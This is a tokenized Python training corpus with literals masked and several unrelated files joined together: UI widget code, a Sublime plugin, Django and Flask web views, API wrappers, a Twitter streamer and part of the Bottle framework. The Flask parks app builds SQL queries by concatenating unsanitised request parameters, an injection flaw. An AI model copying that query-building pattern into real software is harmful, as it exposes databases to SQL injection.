getValue ( ) <EOL> def setValue ( self , newValue , repaintIsNotNeeded = None ) : <EOL> """<STR_LIT>""" <EOL> if repaintIsNotNeeded is None : <EOL> if self . _dataSource is None : <EOL> raise ValueError , '<STR_LIT>' <EOL> self . _dataSource . setValue ( newValue ) <EOL> else : <EOL> super ( ProgressIndicator , self ) . setValue ( newValue , <EOL> repaintIsNotNeeded ) <EOL> def __str__ ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _dataSource is None : <EOL> raise ValueError , '<STR_LIT>' <EOL> return str ( self . _dataSource ) <EOL> def getType ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . _dataSource is None : <EOL> raise ValueError , '<STR_LIT>' <EOL> return self . _dataSource . getType ( ) <EOL> def getPropertyDataSource ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _dataSource <EOL> def setPropertyDataSource ( self , newDataSource ) : <EOL> """<STR_LIT>""" <EOL> if ( self . _dataSource is not None <EOL> and issubclass ( self . _dataSource . __class__ , <EOL> prop . IValueChangeNotifier ) ) : <EOL> self . _dataSource . removeListener ( self , <EOL> prop . IValueChangeListener ) <EOL> self . _dataSource = newDataSource <EOL> if ( self . _dataSource is not None <EOL> and issubclass ( self . _dataSource . __class__ , <EOL> prop . IValueChangeNotifier ) ) : <EOL> self . _dataSource . addListener ( self , prop . IValueChangeListener ) <EOL> def getContentMode ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _indeterminate <EOL> def setIndeterminate ( self , newValue ) : <EOL> """<STR_LIT>""" <EOL> self . _indeterminate = newValue <EOL> self . requestRepaint ( ) <EOL> def isIndeterminate ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _indeterminate <EOL> def setPollingInterval ( self , newValue ) : <EOL> """<STR_LIT>""" <EOL> self . _pollingInterval = newValue <EOL> self . requestRepaint ( ) <EOL> def getPollingInterval ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . _pollingInterval </s>
<s> import os <EOL> import sys <EOL> import subprocess <EOL> import sublime <EOL> import sublime_plugin <EOL> class MouCommand ( sublime_plugin . WindowCommand ) : <EOL> def run ( self ) : <EOL> filename = self . window . active_view ( ) . file_name ( ) <EOL> if filename is None : <EOL> return <EOL> proc_env = os . environ . copy ( ) <EOL> encoding = sys . getfilesystemencoding ( ) <EOL> for k , v in proc_env . items ( ) : <EOL> proc_env [ k ] = os . path . expandvars ( v ) . encode ( encoding ) <EOL> subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , filename ] , env = proc_env ) <EOL> def is_enabled ( self ) : <EOL> return True </s>
<s> """<STR_LIT>""" <EOL> from django . http import HttpResponse , Http404 <EOL> from django . shortcuts import render_to_response <EOL> from django . template import RequestContext <EOL> from django . utils . importlib import import_module <EOL> from cloud_browser . app_settings import settings <EOL> from cloud_browser . cloud import get_connection , get_connection_cls , errors <EOL> from cloud_browser . common import get_int , path_parts , path_join , path_yield , relpath <EOL> MAX_LIMIT = get_connection_cls ( ) . cont_cls . max_list <EOL> def settings_view_decorator ( function ) : <EOL> """<STR_LIT>""" <EOL> dec = settings . CLOUD_BROWSER_VIEW_DECORATOR <EOL> if isinstance ( dec , basestring ) : <EOL> mod_str , _ , dec_str = dec . rpartition ( '<STR_LIT:.>' ) <EOL> if not ( mod_str and dec_str ) : <EOL> raise ImportError ( "<STR_LIT>" % mod_str ) <EOL> mod = import_module ( mod_str ) <EOL> if not hasattr ( mod , dec_str ) : <EOL> raise ImportError ( "<STR_LIT>" % dec ) <EOL> dec = getattr ( mod , dec_str ) <EOL> if dec and callable ( dec ) : <EOL> return dec ( function ) <EOL> return function <EOL> def _breadcrumbs ( path ) : <EOL> """<STR_LIT>""" <EOL> full = None <EOL> crumbs = [ ] <EOL> for part in path_yield ( path ) : <EOL> full = path_join ( full , part ) if full else part <EOL> crumbs . append ( ( full , part ) ) <EOL> return crumbs <EOL> @ settings_view_decorator <EOL> def browser ( request , path = '<STR_LIT>' , template = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> from itertools import ifilter , islice <EOL> container_path , object_path = path_parts ( path ) <EOL> incoming = request . POST or request . GET or { } <EOL> marker = incoming . get ( '<STR_LIT>' , None ) <EOL> marker_part = incoming . get ( '<STR_LIT>' , None ) <EOL> if marker_part : <EOL> marker = path_join ( object_path , marker_part ) <EOL> limit_default = settings . 
CLOUD_BROWSER_DEFAULT_LIST_LIMIT <EOL> limit_test = lambda x : x > <NUM_LIT:0> and ( MAX_LIMIT is None or x <= MAX_LIMIT - <NUM_LIT:1> ) <EOL> limit = get_int ( incoming . get ( '<STR_LIT>' , limit_default ) , <EOL> limit_default , <EOL> limit_test ) <EOL> conn = get_connection ( ) <EOL> containers = conn . get_containers ( ) <EOL> marker_part = None <EOL> container = None <EOL> objects = None <EOL> if container_path != '<STR_LIT>' : <EOL> cont_eq = lambda c : c . name == container_path <EOL> cont_list = list ( islice ( ifilter ( cont_eq , containers ) , <NUM_LIT:1> ) ) <EOL> if not cont_list : <EOL> raise Http404 ( "<STR_LIT>" % container_path ) <EOL> container = cont_list [ <NUM_LIT:0> ] <EOL> objects = container . get_objects ( object_path , marker , limit + <NUM_LIT:1> ) <EOL> marker = None <EOL> if len ( objects ) == limit + <NUM_LIT:1> : <EOL> objects = objects [ : limit ] <EOL> marker = objects [ - <NUM_LIT:1> ] . name <EOL> marker_part = relpath ( marker , object_path ) <EOL> return render_to_response ( template , <EOL> { '<STR_LIT:path>' : path , <EOL> '<STR_LIT>' : marker , <EOL> '<STR_LIT>' : marker_part , <EOL> '<STR_LIT>' : limit , <EOL> '<STR_LIT>' : _breadcrumbs ( path ) , <EOL> '<STR_LIT>' : container_path , <EOL> '<STR_LIT>' : containers , <EOL> '<STR_LIT>' : container , <EOL> '<STR_LIT>' : object_path , <EOL> '<STR_LIT>' : objects } , <EOL> context_instance = RequestContext ( request ) ) <EOL> @ settings_view_decorator <EOL> def document ( _ , path = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> container_path , object_path = path_parts ( path ) <EOL> conn = get_connection ( ) <EOL> try : <EOL> container = conn . get_container ( container_path ) <EOL> except errors . NoContainerException : <EOL> raise Http404 ( "<STR_LIT>" % container_path ) <EOL> except errors . NotPermittedException : <EOL> raise Http404 ( "<STR_LIT>" % container_path ) <EOL> try : <EOL> storage_obj = container . get_object ( object_path ) <EOL> except errors . 
NoObjectException : <EOL> raise Http404 ( "<STR_LIT>" % object_path ) <EOL> content_type = storage_obj . smart_content_type <EOL> encoding = storage_obj . smart_content_encoding <EOL> response = HttpResponse ( content = storage_obj . read ( ) , <EOL> content_type = content_type ) <EOL> if encoding not in ( None , '<STR_LIT>' ) : <EOL> response [ '<STR_LIT>' ] = encoding <EOL> return response </s>
<s> import os <EOL> from datetime import datetime <EOL> from flask import Flask , request , flash , url_for , redirect , render_template , abort <EOL> import pg <EOL> import json <EOL> app = Flask ( __name__ ) <EOL> app . config . from_pyfile ( '<STR_LIT>' ) <EOL> print dir ( app . config ) <EOL> db = pg . connect ( app . config [ '<STR_LIT>' ] , app . config [ '<STR_LIT>' ] , app . config [ '<STR_LIT>' ] , None , None , app . config [ '<STR_LIT>' ] , app . config [ '<STR_LIT>' ] ) <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def index ( ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def parks ( ) : <EOL> table_name = app . config [ '<STR_LIT>' ] <EOL> result = db . query ( '<STR_LIT>' + table_name + "<STR_LIT:;>" ) <EOL> return str ( json . dumps ( list ( result . dictresult ( ) ) ) ) <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def within ( ) : <EOL> table_name = app . config [ '<STR_LIT>' ] <EOL> lat1 = str ( request . args . get ( '<STR_LIT>' ) ) <EOL> lon1 = str ( request . args . get ( '<STR_LIT>' ) ) <EOL> lat2 = str ( request . args . get ( '<STR_LIT>' ) ) <EOL> lon2 = str ( request . args . get ( '<STR_LIT>' ) ) <EOL> limit = <NUM_LIT> <EOL> result = db . query ( "<STR_LIT>" + table_name + "<STR_LIT>" + lon1 + "<STR_LIT:U+002CU+0020>" + lat1 + "<STR_LIT:U+002CU+0020>" + lon2 + "<STR_LIT:U+002CU+0020>" + lat2 + "<STR_LIT>" + str ( limit ) + "<STR_LIT:;>" ) <EOL> return str ( json . dumps ( list ( result . dictresult ( ) ) ) ) <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def serveStaticResource ( resource ) : <EOL> return send_from_directory ( '<STR_LIT>' , resource ) <EOL> @ app . route ( "<STR_LIT>" ) <EOL> def test ( ) : <EOL> return "<STR_LIT>" <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> app . run ( ) </s>
<s> """<STR_LIT>""" <EOL> import urllib2 <EOL> from urlparse import urlparse <EOL> from urllib2 import HTTPError <EOL> __author__ = "<STR_LIT>" <EOL> __version__ = "<STR_LIT:1.0>" <EOL> try : <EOL> import simplejson <EOL> except ImportError : <EOL> try : <EOL> import json as simplejson <EOL> except ImportError : <EOL> try : <EOL> from django . utils import simplejson <EOL> except : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> class PythenticJobsError ( Exception ) : <EOL> def __init__ ( self , msg ) : <EOL> self . msg = msg <EOL> def __str__ ( self ) : <EOL> return repr ( self . msg ) <EOL> class pythentic : <EOL> def __init__ ( self , api_key ) : <EOL> """<STR_LIT>""" <EOL> self . base_url = "<STR_LIT>" % api_key <EOL> def checkResponse ( self , resp ) : <EOL> """<STR_LIT>""" <EOL> if resp [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> return resp <EOL> elif resp [ "<STR_LIT>" ] == "<STR_LIT>" : <EOL> if resp [ "<STR_LIT:code>" ] == <NUM_LIT:0> : <EOL> raise PythenticJobsError ( "<STR_LIT>" ) <EOL> elif resp [ "<STR_LIT:code>" ] == <NUM_LIT:2> : <EOL> raise PythenticJobsError ( "<STR_LIT>" ) <EOL> else : <EOL> raise PythenticJobsError ( "<STR_LIT>" ) <EOL> else : <EOL> raise PythenticJobsError ( "<STR_LIT>" ) <EOL> def getCompanies ( self ) : <EOL> """<STR_LIT>""" <EOL> companies = simplejson . load ( urllib2 . urlopen ( self . base_url + "<STR_LIT>" ) ) <EOL> return self . checkResponse ( companies ) <EOL> def getLocations ( self ) : <EOL> """<STR_LIT>""" <EOL> locations = simplejson . load ( urllib2 . urlopen ( self . base_url + "<STR_LIT>" ) ) <EOL> return self . checkResponse ( locations ) <EOL> def search ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> search_url = self . base_url + "<STR_LIT>" + "<STR_LIT:&>" . join ( [ "<STR_LIT>" % ( key , value ) for ( key , value ) in kwargs . iteritems ( ) ] ) <EOL> results = simplejson . load ( urllib2 . urlopen ( search_url ) ) <EOL> return self . 
checkResponse ( results ) <EOL> def getJobTypes ( self ) : <EOL> """<STR_LIT>""" <EOL> retlist = simplejson . load ( urllib2 . urlopen ( self . base_url + "<STR_LIT>" ) ) <EOL> return self . checkResponse ( retlist ) <EOL> def getJobCategories ( self ) : <EOL> """<STR_LIT>""" <EOL> retlist = simplejson . load ( urllib2 . urlopen ( self . base_url + "<STR_LIT>" ) ) <EOL> return self . checkResponse ( retlist ) </s>
<s> """<STR_LIT>""" <EOL> from . . import __version__ <EOL> from . . compat import json , is_py3 <EOL> from . . helpers import _transparent_params <EOL> from . types import TwythonStreamerTypes <EOL> import requests <EOL> from requests_oauthlib import OAuth1 <EOL> import time <EOL> class TwythonStreamer ( object ) : <EOL> def __init__ ( self , app_key , app_secret , oauth_token , oauth_token_secret , <EOL> timeout = <NUM_LIT> , retry_count = None , retry_in = <NUM_LIT:10> , client_args = None , <EOL> handlers = None , chunk_size = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . auth = OAuth1 ( app_key , app_secret , <EOL> oauth_token , oauth_token_secret ) <EOL> self . client_args = client_args or { } <EOL> default_headers = { '<STR_LIT>' : '<STR_LIT>' + __version__ } <EOL> if '<STR_LIT>' not in self . client_args : <EOL> self . client_args [ '<STR_LIT>' ] = default_headers <EOL> elif '<STR_LIT>' not in self . client_args [ '<STR_LIT>' ] : <EOL> self . client_args [ '<STR_LIT>' ] . update ( default_headers ) <EOL> self . client_args [ '<STR_LIT>' ] = timeout <EOL> self . client = requests . Session ( ) <EOL> self . client . auth = self . auth <EOL> self . client . stream = True <EOL> client_args_copy = self . client_args . copy ( ) <EOL> for k , v in client_args_copy . items ( ) : <EOL> if k in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> setattr ( self . client , k , v ) <EOL> self . client_args . pop ( k ) <EOL> self . api_version = '<STR_LIT>' <EOL> self . retry_in = retry_in <EOL> self . retry_count = retry_count <EOL> StreamTypes = TwythonStreamerTypes ( self ) <EOL> self . statuses = StreamTypes . statuses <EOL> self . user = StreamTypes . user <EOL> self . site = StreamTypes . site <EOL> self . connected = False <EOL> self . handlers = handlers if handlers else [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> self . 
chunk_size = chunk_size <EOL> def _request ( self , url , method = '<STR_LIT:GET>' , params = None ) : <EOL> """<STR_LIT>""" <EOL> self . connected = True <EOL> retry_counter = <NUM_LIT:0> <EOL> method = method . lower ( ) <EOL> func = getattr ( self . client , method ) <EOL> params , _ = _transparent_params ( params ) <EOL> def _send ( retry_counter ) : <EOL> requests_args = { } <EOL> for k , v in self . client_args . items ( ) : <EOL> if k in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> requests_args [ k ] = v <EOL> while self . connected : <EOL> try : <EOL> if method == '<STR_LIT>' : <EOL> requests_args [ '<STR_LIT>' ] = params <EOL> else : <EOL> requests_args [ '<STR_LIT:data>' ] = params <EOL> response = func ( url , ** requests_args ) <EOL> except requests . exceptions . Timeout : <EOL> self . on_timeout ( ) <EOL> else : <EOL> if response . status_code != <NUM_LIT:200> : <EOL> self . on_error ( response . status_code , response . content ) <EOL> if self . retry_count and ( self . retry_count - retry_counter ) > <NUM_LIT:0> : <EOL> time . sleep ( self . retry_in ) <EOL> retry_counter += <NUM_LIT:1> <EOL> _send ( retry_counter ) <EOL> return response <EOL> while self . connected : <EOL> response = _send ( retry_counter ) <EOL> for line in response . iter_lines ( self . chunk_size ) : <EOL> if not self . connected : <EOL> break <EOL> if line : <EOL> try : <EOL> if is_py3 : <EOL> line = line . decode ( '<STR_LIT:utf-8>' ) <EOL> data = json . loads ( line ) <EOL> except ValueError : <EOL> self . on_error ( response . status_code , <EOL> '<STR_LIT>' ) <EOL> else : <EOL> if self . on_success ( data ) : <EOL> for message_type in self . handlers : <EOL> if message_type in data : <EOL> handler = getattr ( self , <EOL> '<STR_LIT>' + message_type , <EOL> None ) <EOL> if handler and callable ( handler ) and not handler ( data . get ( message_type ) ) : <EOL> break <EOL> response . 
close ( ) <EOL> def on_success ( self , data ) : <EOL> """<STR_LIT>""" <EOL> return True <EOL> def on_error ( self , status_code , data ) : <EOL> """<STR_LIT>""" <EOL> return <EOL> def on_timeout ( self ) : <EOL> """<STR_LIT>""" <EOL> return <EOL> def disconnect ( self ) : <EOL> """<STR_LIT>""" <EOL> self . connected = False </s>
<s> """<STR_LIT>""" <EOL> from __future__ import with_statement <EOL> __author__ = '<STR_LIT>' <EOL> __version__ = '<STR_LIT>' <EOL> __license__ = '<STR_LIT>' <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> from optparse import OptionParser <EOL> _cmd_parser = OptionParser ( usage = "<STR_LIT>" ) <EOL> _opt = _cmd_parser . add_option <EOL> _opt ( "<STR_LIT>" , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> _opt ( "<STR_LIT>" , "<STR_LIT>" , metavar = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> _opt ( "<STR_LIT>" , "<STR_LIT>" , default = '<STR_LIT>' , help = "<STR_LIT>" ) <EOL> _opt ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT>" , help = "<STR_LIT>" ) <EOL> _opt ( "<STR_LIT>" , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> _opt ( "<STR_LIT>" , action = "<STR_LIT:store_true>" , help = "<STR_LIT>" ) <EOL> _cmd_options , _cmd_args = _cmd_parser . parse_args ( ) <EOL> if _cmd_options . server and _cmd_options . server . startswith ( '<STR_LIT>' ) : <EOL> import gevent . monkey ; gevent . monkey . patch_all ( ) <EOL> import base64 , cgi , email . utils , functools , hmac , imp , itertools , mimetypes , os , re , subprocess , sys , tempfile , threading , time , urllib , warnings <EOL> from datetime import date as datedate , datetime , timedelta <EOL> from tempfile import TemporaryFile <EOL> from traceback import format_exc , print_exc <EOL> try : from json import dumps as json_dumps , loads as json_lds <EOL> except ImportError : <EOL> try : from simplejson import dumps as json_dumps , loads as json_lds <EOL> except ImportError : <EOL> try : from django . utils . simplejson import dumps as json_dumps , loads as json_lds <EOL> except ImportError : <EOL> def json_dumps ( data ) : <EOL> raise ImportError ( "<STR_LIT>" ) <EOL> json_lds = json_dumps <EOL> py = sys . version_info <EOL> py3k = py >= ( <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> py25 = py < ( <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:0> ) <EOL> def _e ( ) : return sys . 
exc_info ( ) [ <NUM_LIT:1> ] <EOL> _stdout , _stderr = sys . stdout . write , sys . stderr . write <EOL> if py3k : <EOL> import http . client as httplib <EOL> import _thread as thread <EOL> from urllib . parse import urljoin , parse_qsl , SplitResult as UrlSplitResult <EOL> from urllib . parse import urlencode , quote as urlquote , unquote as urlunquote <EOL> from http . cookies import SimpleCookie <EOL> from collections import MutableMapping as DictMixin <EOL> import pickle <EOL> from io import BytesIO <EOL> basestring = str <EOL> unicode = str <EOL> json_loads = lambda s : json_lds ( touni ( s ) ) <EOL> callable = lambda x : hasattr ( x , '<STR_LIT>' ) <EOL> imap = map <EOL> else : <EOL> import httplib <EOL> import thread <EOL> from urlparse import urljoin , SplitResult as UrlSplitResult <EOL> from urllib import urlencode , quote as urlquote , unquote as urlunquote <EOL> from Cookie import SimpleCookie <EOL> from itertools import imap <EOL> import cPickle as pickle <EOL> from StringIO import StringIO as BytesIO <EOL> if py25 : <EOL> msg = "<STR_LIT>" <EOL> warnings . warn ( msg , DeprecationWarning ) <EOL> from cgi import parse_qsl <EOL> from UserDict import DictMixin <EOL> def next ( it ) : return it . next ( ) <EOL> bytes = str <EOL> else : <EOL> from urlparse import parse_qsl <EOL> from collections import MutableMapping as DictMixin <EOL> json_loads = json_lds <EOL> def tob ( s , enc = '<STR_LIT:utf8>' ) : <EOL> return s . encode ( enc ) if isinstance ( s , unicode ) else bytes ( s ) <EOL> def touni ( s , enc = '<STR_LIT:utf8>' , err = '<STR_LIT:strict>' ) : <EOL> return s . 
decode ( enc , err ) if isinstance ( s , bytes ) else unicode ( s ) <EOL> tonat = touni if py3k else tob <EOL> NCTextIOWrapper = None <EOL> if ( <NUM_LIT:3> , <NUM_LIT:0> , <NUM_LIT:0> ) < py < ( <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:0> ) : <EOL> from io import TextIOWrapper <EOL> class NCTextIOWrapper ( TextIOWrapper ) : <EOL> def close ( self ) : pass <EOL> def update_wrapper ( wrapper , wrapped , * a , ** ka ) : <EOL> try : functools . update_wrapper ( wrapper , wrapped , * a , ** ka ) <EOL> except AttributeError : pass <EOL> def depr ( message ) : <EOL> warnings . warn ( message , DeprecationWarning , stacklevel = <NUM_LIT:3> ) <EOL> def makelist ( data ) : <EOL> if isinstance ( data , ( tuple , list , set , dict ) ) : return list ( data ) <EOL> elif data : return [ data ] <EOL> else : return [ ] <EOL> class DictProperty ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , attr , key = None , read_only = False ) : <EOL> self . attr , self . key , self . read_only = attr , key , read_only <EOL> def __call__ ( self , func ) : <EOL> functools . update_wrapper ( self , func , updated = [ ] ) <EOL> self . getter , self . key = func , self . key or func . __name__ <EOL> return self <EOL> def __get__ ( self , obj , cls ) : <EOL> if obj is None : return self <EOL> key , storage = self . key , getattr ( obj , self . attr ) <EOL> if key not in storage : storage [ key ] = self . getter ( obj ) <EOL> return storage [ key ] <EOL> def __set__ ( self , obj , value ) : <EOL> if self . read_only : raise AttributeError ( "<STR_LIT>" ) <EOL> getattr ( obj , self . attr ) [ self . key ] = value <EOL> def __delete__ ( self , obj ) : <EOL> if self . read_only : raise AttributeError ( "<STR_LIT>" ) <EOL> del getattr ( obj , self . attr ) [ self . key ] <EOL> class cached_property ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , func ) : <EOL> self . func = func <EOL> def __get__ ( self , obj , cls ) : <EOL> if obj is None : return self <EOL> value = obj . 
__dict__ [ self . func . __name__ ] = self . func ( obj ) <EOL> return value <EOL> class lazy_attribute ( object ) : <EOL> '''<STR_LIT>''' <EOL> def __init__ ( self , func ) : <EOL> functools . update_wrapper ( self , func , updated = [ ] ) <EOL> self . getter = func <EOL> def __get__ ( self , obj , cls ) : <EOL> value = self . getter ( cls ) <EOL> setattr ( cls , self . __name__ , value ) <EOL> return value <EOL> class BottleException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class HTTPResponse ( BottleException ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , output = '<STR_LIT>' , status = <NUM_LIT:200> , header = None ) : <EOL> super ( BottleException , self ) . __init__ ( "<STR_LIT>" % status ) <EOL> self . status = int ( status ) <EOL> self . output = output <EOL> self . headers = HeaderDict ( header ) if header else None <EOL> def apply ( self , response ) : <EOL> if self . headers : <EOL> for key , value in self . headers . allitems ( ) : <EOL> response . headers [ key ] = value <EOL> response . status = self . status <EOL> class HTTPError ( HTTPResponse ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , code = <NUM_LIT> , output = '<STR_LIT>' , exception = None , <EOL> traceback = None , header = None ) : <EOL> super ( HTTPError , self ) . __init__ ( output , code , header ) <EOL> self . exception = exception <EOL> self . traceback = traceback <EOL> def __repr__ ( self ) : <EOL> return tonat ( template ( ERROR_PAGE_TEMPLATE , e = self ) ) <EOL> class RouteError ( BottleException ) : <EOL> """<STR_LIT>""" <EOL> class RouteReset ( BottleException ) : <EOL> """<STR_LIT>""" <EOL> class RouterUnknownModeError ( RouteError ) : pass <EOL> class RouteSyntaxError ( RouteError ) : <EOL> """<STR_LIT>""" <EOL> class RouteBuildError ( RouteError ) : <EOL> """<STR_LIT>""" <EOL> class Router ( object ) : <EOL> '''<STR_LIT>''' <EOL> default_pattern = '<STR_LIT>' <EOL> default_filter = '<STR_LIT>' <EOL> rule_syntax = re . 
compile ( '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' '<STR_LIT>' ) <EOL> def __init__ ( self , strict = False ) : <EOL> self . rules = { } <EOL> self . builder = { } <EOL> self . static = { } <EOL> self . dynamic = [ ] <EOL> self . strict_order = strict <EOL> self . filters = { '<STR_LIT>' : self . re_filter , '<STR_LIT:int>' : self . int_filter , <EOL> '<STR_LIT:float>' : self . float_filter , '<STR_LIT:path>' : self . path_filter } <EOL> def re_filter ( self , conf ) : <EOL> return conf or self . default_pattern , None , None <EOL> def int_filter ( self , conf ) : <EOL> return r'<STR_LIT>' , int , lambda x : str ( int ( x ) ) <EOL> def float_filter ( self , conf ) : <EOL> return r'<STR_LIT>' , float , lambda x : str ( float ( x ) ) <EOL> def path_filter ( self , conf ) : <EOL> return r'<STR_LIT>' , None , None <EOL> def add_filter ( self , name , func ) : <EOL> '''<STR_LIT>''' <EOL> self . filters [ name ] = func <EOL> def parse_rule ( self , rule ) : <EOL> '''<STR_LIT>''' <EOL> offset , prefix = <NUM_LIT:0> , '<STR_LIT>' <EOL> for match in self . rule_syntax . finditer ( rule ) : <EOL> prefix += rule [ offset : match . start ( ) ] <EOL> g = match . groups ( ) <EOL> if len ( g [ <NUM_LIT:0> ] ) % <NUM_LIT:2> : <EOL> prefix += match . group ( <NUM_LIT:0> ) [ len ( g [ <NUM_LIT:0> ] ) : ] <EOL> offset = match . end ( ) <EOL> continue <EOL> if prefix : yield prefix , None , None <EOL> name , filtr , conf = g [ <NUM_LIT:1> : <NUM_LIT:4> ] if not g [ <NUM_LIT:2> ] is None else g [ <NUM_LIT:4> : <NUM_LIT:7> ] <EOL> if not filtr : filtr = self . default_filter <EOL> yield name , filtr , conf or None <EOL> offset , prefix = match . end ( ) , '<STR_LIT>' <EOL> if offset <= len ( rule ) or prefix : <EOL> yield prefix + rule [ offset : ] , None , None <EOL> def add ( self , rule , method , target , name = None ) : <EOL> '''<STR_LIT>''' <EOL> if rule in self . rules : <EOL> self . rules [ rule ] [ method ] = target <EOL> if name : self . builder [ name ] = self . 
builder [ rule ] <EOL> return <EOL> target = self . rules [ rule ] = { method : target } <EOL> anons = <NUM_LIT:0> <EOL> pattern = '<STR_LIT>' <EOL> filters = [ ] <EOL> builder = [ ] <EOL> is_static = True <EOL> for key , mode , conf in self . parse_rule ( rule ) : <EOL> if mode : <EOL> is_static = False <EOL> mask , in_filter , out_filter = self . filters [ mode ] ( conf ) <EOL> if key : <EOL> pattern += '<STR_LIT>' % ( key , mask ) <EOL> else : <EOL> pattern += '<STR_LIT>' % mask <EOL> key = '<STR_LIT>' % anons ; anons += <NUM_LIT:1> <EOL> if in_filter : filters . append ( ( key , in_filter ) ) <EOL> builder . append ( ( key , out_filter or str ) ) <EOL> elif key : <EOL> pattern += re . escape ( key ) <EOL> builder . append ( ( None , key ) ) <EOL> self . builder [ rule ] = builder <EOL> if name : self . builder [ name ] = builder <EOL> if is_static and not self . strict_order : <EOL> self . static [ self . build ( rule ) ] = target <EOL> return <EOL> def fpat_sub ( m ) : <EOL> return m . group ( <NUM_LIT:0> ) if len ( m . group ( <NUM_LIT:1> ) ) % <NUM_LIT:2> else m . group ( <NUM_LIT:1> ) + '<STR_LIT>' <EOL> flat_pattern = re . sub ( r'<STR_LIT>' , fpat_sub , pattern ) <EOL> try : <EOL> re_match = re . compile ( '<STR_LIT>' % pattern ) . match <EOL> except re . error : <EOL> raise RouteSyntaxError ( "<STR_LIT>" % ( rule , _e ( ) ) ) <EOL> def match ( path ) : <EOL> """<STR_LIT>""" <EOL> url_args = re_match ( path ) . groupdict ( ) <EOL> for name , wildcard_filter in filters : <EOL> try : <EOL> url_args [ name ] = wildcard_filter ( url_args [ name ] ) <EOL> except ValueError : <EOL> raise HTTPError ( <NUM_LIT> , '<STR_LIT>' ) <EOL> return url_args <EOL> try : <EOL> combined = '<STR_LIT>' % ( self . dynamic [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] . pattern , flat_pattern ) <EOL> self . dynamic [ - <NUM_LIT:1> ] = ( re . compile ( combined ) , self . dynamic [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ) <EOL> self . dynamic [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] . 
append ( ( match , target ) ) <EOL> except ( AssertionError , IndexError ) : <EOL> self . dynamic . append ( ( re . compile ( '<STR_LIT>' % flat_pattern ) , <EOL> [ ( match , target ) ] ) ) <EOL> return match <EOL> def build ( self , _name , * anons , ** query ) : <EOL> '''<STR_LIT>''' <EOL> builder = self . builder . get ( _name ) <EOL> if not builder : raise RouteBuildError ( "<STR_LIT>" , _name ) <EOL> try : <EOL> for i , value in enumerate ( anons ) : query [ '<STR_LIT>' % i ] = value <EOL> url = '<STR_LIT>' . join ( [ f ( query . pop ( n ) ) if n else f for ( n , f ) in builder ] ) <EOL> return url if not query else url + '<STR_LIT:?>' + urlencode ( query ) <EOL> except KeyError : <EOL> raise RouteBuildError ( '<STR_LIT>' % _e ( ) . args [ <NUM_LIT:0> ] ) <EOL> def match ( self , environ ) : <EOL> '''<STR_LIT>''' <EOL> path , targets , urlargs = environ [ '<STR_LIT>' ] or '<STR_LIT:/>' , None , { } <EOL> if path in self . static : <EOL> targets = self . static [ path ] <EOL> else : <EOL> for combined , rules in self . dynamic : <EOL> match = combined . match ( path ) <EOL> if not match : continue <EOL> getargs , targets = rules [ match . lastindex - <NUM_LIT:1> ] <EOL> urlargs = getargs ( path ) if getargs else { } <EOL> break <EOL> if not targets : <EOL> raise HTTPError ( <NUM_LIT> , "<STR_LIT>" + repr ( environ [ '<STR_LIT>' ] ) ) <EOL> method = environ [ '<STR_LIT>' ] . upper ( ) <EOL> if method in targets : <EOL> return targets [ method ] , urlargs <EOL> if method == '<STR_LIT>' and '<STR_LIT:GET>' in targets : <EOL> return targets [ '<STR_LIT:GET>' ] , urlargs <EOL> if '<STR_LIT>' in targets : <EOL> return targets [ '<STR_LIT>' ] , urlargs <EOL> allowed = [ verb for verb in targets if verb != '<STR_LIT>' ] <EOL> if '<STR_LIT:GET>' in allowed and '<STR_LIT>' not in allowed : <EOL> allowed . append ( '<STR_LIT>' ) <EOL> raise HTTPError ( <NUM_LIT> , "<STR_LIT>" , <EOL> header = [ ( '<STR_LIT>' , "<STR_LIT:U+002C>" . 
